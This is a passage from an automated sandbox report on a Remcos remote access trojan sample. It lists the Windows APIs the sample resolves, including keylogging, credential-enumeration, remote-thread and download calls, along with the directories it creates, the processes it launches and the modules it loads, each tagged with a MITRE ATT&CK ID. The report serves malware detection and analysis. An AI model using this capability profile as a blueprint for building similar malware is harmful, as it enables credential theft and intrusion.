\"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptEncrypt (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptDecrypt (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptGenKey (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptEncrypt (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptDecrypt (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptImportKey (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptImportKeyPair (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptExportKey (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptGenerateKeyPair (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptOpenAlgorithmProvider (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptSetProperty (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf2 (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RpcServerUseProtseqEpW (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005888)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateRemoteThread (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetNativeSystemInfo (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CopyFileA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter WinExec (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter OpenMutexA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter OpenMutexW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLangID (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SetFileTime (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetWriteWatch (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter HeapWalk (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter IsNativeVhdBoot (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter DebugBreak (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlGetNtProductType (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LdrLoadDll (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LdrUnloadDll (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LdrGetDllHandle (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LdrGetProcedureAddress (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlAddVectoredExceptionHandler (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter NtSystemDebugControl (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlCompressBuffer (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBuffer (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBufferEx (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleBitmap (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetIpNetTable (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetTcpTable2 (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetBestRoute (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetAsyncKeyState (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetActiveWindow (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetWindowTextW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CredEnumerateA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CredEnumerateW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatusEx (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfigW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithTokenW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter LsaLookupSids (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SystemFunction032 (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter SystemFunction033 (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetOpenA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetOpenW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter HttpOpenRequestW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetConnectA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetConnectW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetQueryOptionW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetSetOptionW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter InternetReadFile (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ObtainUserAgentString (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptEncrypt (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptDecrypt (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter CryptGenKey (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptEncrypt (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptDecrypt (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptImportKey (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptImportKeyPair (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptExportKey (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptGenerateKeyPair (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptOpenAlgorithmProvider (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter BCryptSetProperty (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RpcServerRegisterIf2 (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RpcServerUseProtseqEpW (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00001852)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00001852)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"file.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\tst (UID: 00000000-00005804)\n \"file.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005804)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\tst (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"file.exe\" called \"CreateProcessW\" with parameter \"\"%ALLUSERSPROFILE%\\tst\\remcos.exe\"\" - (UID: 00000000-00005804)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"%PROGRAMFILES%\\internet explorer\\iexplore.exe\" - (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"file.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70650000\n \"file.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"file.exe\" loaded module \"KERNEL32\" at base 75730000\n \"file.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"file.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 68b40000\n \"file.exe\" loaded module \"RSTRTMGR\" at base 6b5f0000\n \"file.exe\" loaded module \"KERNEL32.DLL\" at base 75730000\n \"file.exe\" loaded module \"OLE32.DLL\" at base 75990000\n \"file.exe\" loaded module \"CRYPTBASE.DLL\" at base 74f90000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73df0000\n \"file.exe\" loaded module \"ADVAPI32.DLL\" at base 758e0000\n \"file.exe\" loaded module \"PROPSYS.DLL\" at base 73b50000\n \"file.exe\" loaded module \"COMCTL32.DLL\" at base 73f00000\n \"file.exe\" loaded module \"OLEAUT32.DLL\" at base 76740000\n \"file.exe\" loaded module \"SHELL32.DLL\" at base 75af0000\n \"file.exe\" loaded module \"CLBCATQ.DLL\" at base 76a60000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73b50000\n \"file.exe\" loaded module \"NTMARTA.DLL\" at base 74470000\n \"file.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77260000\n \"file.exe\" loaded module \"PROFAPI.DLL\" at base 75010000\n \"file.exe\" loaded module \"APPHELP.DLL\" at base 74eb0000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\TWEXT.DLL\" at base 69e10000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CSCUI.DLL\" at base 6b880000\n \"file.exe\" loaded module \"RPCRT4.DLL\" at base 76cb0000\n \"file.exe\" loaded module \"CSCAPI.DLL\" at base 6fe60000\n \"file.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77260000\n \"file.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77260000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CSCOBJ.DLL\" at base 6b850000\n \"file.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77260000\n \"file.exe\" loaded module \"CRYPTSP.DLL\" at base 74a10000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 747a0000\n \"file.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74fa0000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75af0000\n \"file.exe\" loaded module \"USERENV.DLL\" at base 75310000\n \"file.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75730000\n \"file.exe\" loaded module \"SETUPAPI.DLL\" at base 767e0000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6f900000\n \"file.exe\" loaded module \"%PROGRAMFILES%\\MICROS~3\\OFFICE14\\GROOVEEX.DLL\" at base 6ee60000\n \"file.exe\" loaded module \"%PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\CULTURES\\OFFICE.ODF\" at base 6ea40000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTSHRUI.DLL\" at base 71a80000\n \"file.exe\" loaded module \"SRVCLI.DLL\" at base 74c00000\n \"file.exe\" loaded module \"SLC.DLL\" at base 73500000\n \"file.exe\" loaded module \"IMM32.DLL\" at base 76af0000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SYNCUI.DLL\" at base 6b180000\n \"file.exe\" loaded module \"%PROGRAMFILES%\\7-ZIP\\7-ZIP.DLL\" at base 10000000\n \"file.exe\" loaded module \"%LOCALAPPDATA%\\MICROSOFT\\ONEDRIVE\\17.3.4604.0120\\FILESYNCSHELL.DLL\" at base 6fe70000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ACPPAGE.DLL\" at base 6bc00000\n \"file.exe\" loaded module \"DEVRTL.DLL\" at base 74780000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76b10000\n \"file.exe\" loaded module \"SECUR32.DLL\" at base 74d30000\n \"file.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 752c0000\n \"file.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 702f0000\n \"file.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74eb0000\n \"file.exe\" loaded module \"NETUTILS.DLL\" at base 73db0000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70650000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"remcos.exe\" loaded module \"KERNEL32\" at base 75730000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"remcos.exe\" loaded module \"RSTRTMGR\" at base 6b180000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74eb0000\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 4c0000\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXSSL32.DLL\" at base 530000\n \"remcos.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-1\" at base 0\n \"remcos.exe\" loaded module \"EXT-MS-WIN-KERNEL32-PACKAGE-CURRENT-L1-1-0\" at base 0\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d0000\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXSSL32.DLL\" at base 720000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"file.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter CSCAPI.dll (UID: 00000000-00005804)\n \"file.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005804)\n \"file.exe\" called 